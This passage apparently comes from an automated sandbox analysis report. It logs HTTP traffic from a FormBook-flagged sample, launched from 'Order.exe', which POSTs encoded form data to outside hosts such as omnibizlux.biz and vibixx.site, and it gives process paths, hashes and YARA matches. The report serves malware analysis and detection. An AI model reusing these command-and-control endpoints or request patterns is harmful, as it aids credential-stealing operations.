                                                              Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.749999167.172.133.32801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:25.958107948 CET1646OUTPOST /jlqg/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.omnibizlux.biz
                                                              Origin: http://www.omnibizlux.biz
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.omnibizlux.biz/jlqg/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 78 62 59 4f 45 44 33 58 75 76 49 77 66 5a 51 5a 5a 6c 48 6f 68 42 5a 62 4a 59 6b 34 61 64 73 4e 33 34 4a 45 67 44 5a 2b 2f 46 47 79 64 4c 35 6a 72 70 35 67 47 72 46 70 7a 2f 53 6c 55 62 68 6c 50 49 33 7a 68 68 76 49 56 47 45 6d 73 6d 4e 43 30 4e 78 33 35 61 2b 74 74 47 48 57 57 76 7a 69 53 63 59 6e 4e 44 73 73 6e 43 34 37 73 6a 52 5a 4c 68 70 44 6f 54 77 61 67 77 7a 58 43 56 6b 4a 49 72 53 75 36 30 61 57 74 48 42 39 48 45 6c 6b 75 6d 34 4c 35 75 66 61 7a 72 75 7a 77 31 54 35 67 76 4d 64 72 35 45 45 57 31 4b 54 34 7a 64 77 4e 4b 49 37 73 6b 65 4f 50 6d 58 39 65 74 49 39 4d 32 4b 78 5a 61 33 4e 56 31 4c 62 68 6c 39 66 61 49 67 73 4d 77 55 7a 30 70 30 39 65 41 6b 4b 57 61 49 34 43 72 4f 4b 4b 7a 50 79 43 69 6e 71 51 4a 4f 76 4f 34 41 62 67 62 6b 76 69 72 5a 59 63 33 4f 59 6e 33 4a 7a 4d 61 79 63 57 73 58 46 4f 71 6d 73 79 6d 6d 54 45 68 47 47 68 43 62 79 65 6e 54 70 56 48 6f 37 50 33 55 69 55 4c 70 4a 73 6a 30 62 49 46 37 35 73 6f 46 65 76 7a 68 71 6f 41 6b 57 57 41 35 38 6b 4d 33 36 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=xbYOED3XuvIwfZQZZlHohBZbJYk4adsN34JEgDZ+/FGydL5jrp5gGrFpz/SlUbhlPI3zhhvIVGEmsmNC0Nx35a+ttGHWWvziScYnNDssnC47sjRZLhpDoTwagwzXCVkJIrSu60aWtHB9HElkum4L5ufazruzw1T5gvMdr5EEW1KT4zdwNKI7skeOPmX9etI9M2KxZa3NV1Lbhl9faIgsMwUz0p09eAkKWaI4CrOKKzPyCinqQJOvO4AbgbkvirZYc3OYn3JzMaycWsXFOqmsymmTEhGGhCbyenTpVHo7P3UiULpJsj0bIF75soFevzhqoAkWWA58kM36yUHuLBc/vQ6SAMr6yhAoiEVC2w9xQAAfFimC5DN2MytK+XqyUXJdzPhcul7KX5N9wWSVsZPSLUDQwD78lrNKjNdAm9Gi6kW/7P0vjV60qwpt1VTivgIJRTmJT/A8cLL5laEB3RO+5JW64CRLwGdu436aqpFlzL/kFB05gOGI43rxDRnYbcIi/85dc9T+vSwOExOmcfQ/n8UzdjPfKs8TOqge6Fo9mIiqd49BlosCScemAbWjm8rAZKohCpHdqUpPAVKutPXvq8kNwnsAw1MYjsNeinIK8BPo95tNmljaqp1p1pGNwm2Wa8zjjS9ROQsbuG8/QVepty8jbrn2YyOF5PiN8Wm8f27X+wOYd0hpCEEa4J9h4gWKl+dJW9XTHRVERpAxNsYdVRQhBgwmtYkEpDQyMdi4S20uU3jAlKOo2BGqKcX7o2eFqPaYQZsxFqr1TGEjBhlG8ZIP8e60NPBU9YNPTJ7JBktS1R1dqmrGKh9DHr1h+Ncg+dmweWGpwKdTn1VuLgZ336b58ZYwj/FElF0mM3F4oeQVpW/oWav1/kEaGDjg2dxbQVcL7PX/+dAhWkwXiuk/GY83A8WkTjOoTr4fku29IbQSC9URcPRMBbjaD9InCX1Z0MEtRkoWWB6RF3Zqd1CooEKko1x5ner3cgh8eqv9YeArzp [TRUNCATED]
                                                              Nov 12, 2024 15:32:26.682861090 CET306INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.26.1
                                                              Date: Tue, 12 Nov 2024 14:32:26 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.750000167.172.133.32801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:28.499835014 CET342OUTGET /jlqg/?ZtwlQ=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1stpe7mm3wauuEAY4FKC8z+iht6Qhedx9FkGs7kW/sJA05D+zdwUDUvmBi&ZX=G2OXK HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.omnibizlux.biz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:32:29.160559893 CET303INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.26.1
                                                              Date: Tue, 12 Nov 2024 14:32:29 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 153
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.750002162.0.211.143801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:34.787796974 CET604OUTPOST /4xim/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.vibixx.site
                                                              Origin: http://www.vibixx.site
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.vibixx.site/4xim/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 35 59 55 76 49 6d 75 49 42 78 66 66 4e 4b 42 31 65 65 32 36 6d 68 76 61 4c 4b 61 52 79 46 30 4b 45 37 34 45 62 68 67 6b 63 35 2f 7a 66 53 72 50 31 79 39 65 4b 54 52 69 52 6c 34 53 64 56 4e 38 42 63 41 4f 39 56 6f 37 4b 62 4a 34 46 48 45 2b 52 37 54 61 35 38 6a 47 41 49 78 63 4f 54 4a 6c 6e 56 70 45 67 4c 38 67 2b 48 47 45 6f 49 6e 37 45 75 59 6e 67 4b 30 73 45 43 57 41 6e 69 69 46 4d 71 2b 73 61 38 5a 30 33 2f 64 4b 4e 76 55 6b 36 74 57 38 36 2b 61 68 53 6e 61 66 42 36 6e 66 2b 69 32 69 42 76 4c 67 7a 64 54 39 63 62 4b 45 6f 4c 39 54 56 42 76 61 38 59 2b 74 76 77 72 37 78 37 4b 66 68 70 52 6d 59 4b 6b 2b 47 42 39 56 5a 67 3d 3d
                                                              Data Ascii: ZtwlQ=5YUvImuIBxffNKB1ee26mhvaLKaRyF0KE74Ebhgkc5/zfSrP1y9eKTRiRl4SdVN8BcAO9Vo7KbJ4FHE+R7Ta58jGAIxcOTJlnVpEgL8g+HGEoIn7EuYngK0sECWAniiFMq+sa8Z03/dKNvUk6tW86+ahSnafB6nf+i2iBvLgzdT9cbKEoL9TVBva8Y+tvwr7x7KfhpRmYKk+GB9VZg==
                                                              Nov 12, 2024 15:32:35.459532022 CET533INHTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:32:35 GMT
                                                              Server: Apache
                                                              Content-Length: 389
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.750003162.0.211.143801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:37.327239990 CET624OUTPOST /4xim/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.vibixx.site
                                                              Origin: http://www.vibixx.site
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.vibixx.site/4xim/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 35 59 55 76 49 6d 75 49 42 78 66 66 66 61 52 31 62 39 4f 36 71 52 76 5a 56 61 61 52 39 6c 30 57 45 37 30 45 62 67 30 30 41 62 62 7a 66 7a 62 50 32 32 4a 65 48 7a 52 69 65 46 34 58 5a 56 4e 69 42 63 38 38 39 52 30 37 4b 66 5a 34 46 47 30 2b 52 49 37 64 2f 73 6a 45 49 6f 78 65 4b 54 4a 6c 6e 56 70 45 67 4c 5a 37 2b 48 4f 45 6f 34 58 37 45 4d 77 6b 74 71 30 74 48 43 57 41 74 43 6a 4f 4d 71 2f 4c 61 39 46 65 33 38 6c 4b 4e 75 6b 6b 36 63 57 2f 77 2b 61 6a 66 48 62 2b 41 36 79 58 30 6e 61 39 41 4d 66 30 2b 64 36 43 51 4e 4c 6d 79 70 78 2f 4c 51 58 68 34 61 61 62 34 57 32 4f 7a 36 4f 48 73 4c 6c 48 48 39 42 55 4c 54 63 52 50 65 61 45 7a 6c 46 66 2b 30 30 58 77 65 33 58 75 2b 53 6f 75 2f 41 3d
                                                              Data Ascii: ZtwlQ=5YUvImuIBxfffaR1b9O6qRvZVaaR9l0WE70Ebg00AbbzfzbP22JeHzRieF4XZVNiBc889R07KfZ4FG0+RI7d/sjEIoxeKTJlnVpEgLZ7+HOEo4X7EMwktq0tHCWAtCjOMq/La9Fe38lKNukk6cW/w+ajfHb+A6yX0na9AMf0+d6CQNLmypx/LQXh4aab4W2Oz6OHsLlHH9BULTcRPeaEzlFf+00Xwe3Xu+Sou/A=
                                                              Nov 12, 2024 15:32:37.989630938 CET533INHTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:32:37 GMT
                                                              Server: Apache
                                                              Content-Length: 389
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.750004162.0.211.143801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:39.873861074 CET1637OUTPOST /4xim/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.vibixx.site
                                                              Origin: http://www.vibixx.site
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.vibixx.site/4xim/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 35 59 55 76 49 6d 75 49 42 78 66 66 66 61 52 31 62 39 4f 36 71 52 76 5a 56 61 61 52 39 6c 30 57 45 37 30 45 62 67 30 30 41 62 54 7a 66 41 54 50 30 58 4a 65 47 7a 52 69 58 6c 34 57 5a 56 4d 2b 42 63 6c 33 39 52 34 42 4b 5a 46 34 48 6b 4d 2b 58 35 37 64 78 73 6a 45 45 49 78 66 4f 54 49 78 6e 56 35 41 67 4c 4a 37 2b 48 4f 45 6f 36 50 37 4e 2b 59 6b 2b 61 30 73 45 43 57 55 6e 69 6a 6d 4d 71 33 78 61 39 42 6b 30 4e 46 4b 4e 4f 30 6b 68 4f 75 2f 38 2b 61 62 59 48 62 63 41 36 75 59 30 6d 79 48 41 50 44 65 2b 65 61 43 54 73 72 37 75 71 5a 6b 59 77 66 48 6b 35 75 6e 77 51 36 62 2b 38 43 44 6d 38 46 67 41 75 42 74 48 7a 55 72 46 62 36 63 76 47 68 75 6d 6c 34 5a 34 35 69 77 79 2f 43 37 79 37 37 46 33 47 7a 59 33 2b 30 30 50 4f 6c 4b 6c 56 63 59 49 41 58 6d 4f 31 78 6c 59 38 50 6e 4d 68 71 47 54 75 6a 41 54 73 38 2b 74 49 67 49 56 6b 53 77 73 46 52 38 6b 70 78 36 31 7a 64 4c 74 38 6e 52 75 4e 6d 49 73 4b 46 4e 49 6d 2b 6f 6d 50 71 4a 42 49 64 2b 6b 51 66 6f 31 64 61 42 61 36 65 7a 56 6e 41 41 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=5YUvImuIBxfffaR1b9O6qRvZVaaR9l0WE70Ebg00AbTzfATP0XJeGzRiXl4WZVM+Bcl39R4BKZF4HkM+X57dxsjEEIxfOTIxnV5AgLJ7+HOEo6P7N+Yk+a0sECWUnijmMq3xa9Bk0NFKNO0khOu/8+abYHbcA6uY0myHAPDe+eaCTsr7uqZkYwfHk5unwQ6b+8CDm8FgAuBtHzUrFb6cvGhuml4Z45iwy/C7y77F3GzY3+00POlKlVcYIAXmO1xlY8PnMhqGTujATs8+tIgIVkSwsFR8kpx61zdLt8nRuNmIsKFNIm+omPqJBId+kQfo1daBa6ezVnAApMpFqQCcFR/U5l4N2185S+CMPwjQQyKuvqK8UEQAw9p2CfQ4v1tyj1BSMq/bQCDvkSdYYbPuFWdD+ahoc0ieD8Oc1+xGFa4oJVD9oxaYaXKRXP4z/RYySHa+XWTXcTDDCn2F7MJXk9kheYorkJ6xS4mTwjZvLyur3foaquSKuv/IVaO5go44UOgb01Tg3UekOKDdSvwYokNgvT4KRbZkj5r8j2nnlz+K0sXk9wIzAXw6dS5xRcyggpXWXLnW8Ys4T5eoBfJfSLCML+D39GfkhJ5IymdoRCFDfDuQGLtVlipzUOkeRV8clGr8XwhqSrVGKLjkTX/iLw59Q5leYYu90VIp2msz7KN0gNXShjXsbyQT+XRcXwL+jOP+UnJCK0jG1Gwe1zNt22S/l4q1oxA4nt3rOQhg2856GXNl4qG91knOQLAOHtcqsCJtKNw6fYgyNVx+vdfcajDETu9SyjeW+rOBmzale+tDYHHwCtGwDwLRw1neME4Q5o4UxQvzpak5IIeLwGXTWv+HXzViJWWlXyyIsV4u2gpP1Vr20agyMD/0GCgrHDvfBTUToBoCFnppcq7Ffb+yeRtKMw4/XHvF3vET2q4bENKGNpMPnxizcxVb9jQ4xsfHz2YbqnQ9f0t2WVNALTKVmoQb1XIYJFM6StpDI0qqu4uuCU [TRUNCATED]
                                                              Nov 12, 2024 15:32:40.572204113 CET533INHTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:32:40 GMT
                                                              Server: Apache
                                                              Content-Length: 389
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.750005162.0.211.143801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:42.413814068 CET339OUTGET /4xim/?ZX=G2OXK&ZtwlQ=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP20/OCD6R2GxJg22BCsIc2mVLkjoCYHOMomb5GKySOlS/QA9Ktb+YS58Qw HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.vibixx.site
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:32:43.097803116 CET548INHTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:32:43 GMT
                                                              Server: Apache
                                                              Content-Length: 389
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:09:29:43
                                                              Start date:12/11/2024
                                                              Path:C:\Users\user\Desktop\Order.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Order.exe"
                                                              Imagebase:0x430000
                                                              File size:704'000 bytes
                                                              MD5 hash:7E1AFC9B104325C33A1A94E672725E0B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:09:29:59
                                                              Start date:12/11/2024
                                                              Path:C:\Users\user\Desktop\Order.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Order.exe"
                                                              Imagebase:0xf40000
                                                              File size:704'000 bytes
                                                              MD5 hash:7E1AFC9B104325C33A1A94E672725E0B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:11:28:10
                                                              Start date:12/11/2024
                                                              Path:C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe"
                                                              Imagebase:0x1d0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
